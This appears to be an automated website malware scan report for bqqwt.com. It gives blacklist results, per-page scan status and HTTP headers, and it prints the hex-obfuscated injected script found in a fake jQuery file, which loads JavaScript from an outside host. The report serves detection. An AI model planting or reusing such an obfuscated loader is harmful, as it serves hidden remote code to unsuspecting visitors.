Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bqqwt.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bqqwt.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bqqwt.com/ | 200 OK Content-Length: 10799 Content-Type: text/html | clean |
http://bqqwt.com/jquery-1.1.0.min.js | 200 OK Content-Length: 682 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x39\x39\x33\x34\x35\x2e\x63\x6f\x6d\x2f\x4a\x69\x6e\x44\x2e\x70\x68\x70\"\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");
document.writeln('<script language=\"javascript\" src=\"http://count41.51yes.com/click.aspx?id=419570711&logo=3\" charset=\"gb2312\"></script>');
document.writeln('<script language=\"javascript\" src=\"http://count41.51yes.com/click.aspx?id=414590753&logo=12\" charset=\"gb2312\"></script>');
Antivirus reports:
http://bqqwt.com/catalog.asp?page=2 | 200 OK Content-Length: 10895 Content-Type: text/html | clean |
http://bqqwt.com/test404page.js | 404 Not Found Content-Length: 83 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=3 | 200 OK Content-Length: 10921 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=4 | 200 OK Content-Length: 9738 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=5 | 200 OK Content-Length: 10442 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=6 | 200 OK Content-Length: 10873 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=7 | 200 OK Content-Length: 9704 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=8 | 200 OK Content-Length: 9882 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=9 | 200 OK Content-Length: 9891 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=10 | 200 OK Content-Length: 10886 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=11 | 200 OK Content-Length: 10372 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=12 | 200 OK Content-Length: 9168 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=13 | 200 OK Content-Length: 9713 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bqqwt.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 16 Apr 2014 01:22:50 GMT
Server: Microsoft-IIS/6.0
Content-Length: 10799
Content-Type: text/html; Charset=UTF-8
Last-Modified: Tue, 15 Apr 2014 02:18:39 GMT
Product: Z-Blog 2.2 Prism Build 130801
Set-Cookie: ASPSESSIONIDASDATDAA=AEHJGONCDOIFOICMAJAAEOAC; path=/
X-Powered-By: ASP.NET
...10799 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bqqwt.com
Referer: http://www.google.com/search?q=bqqwt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.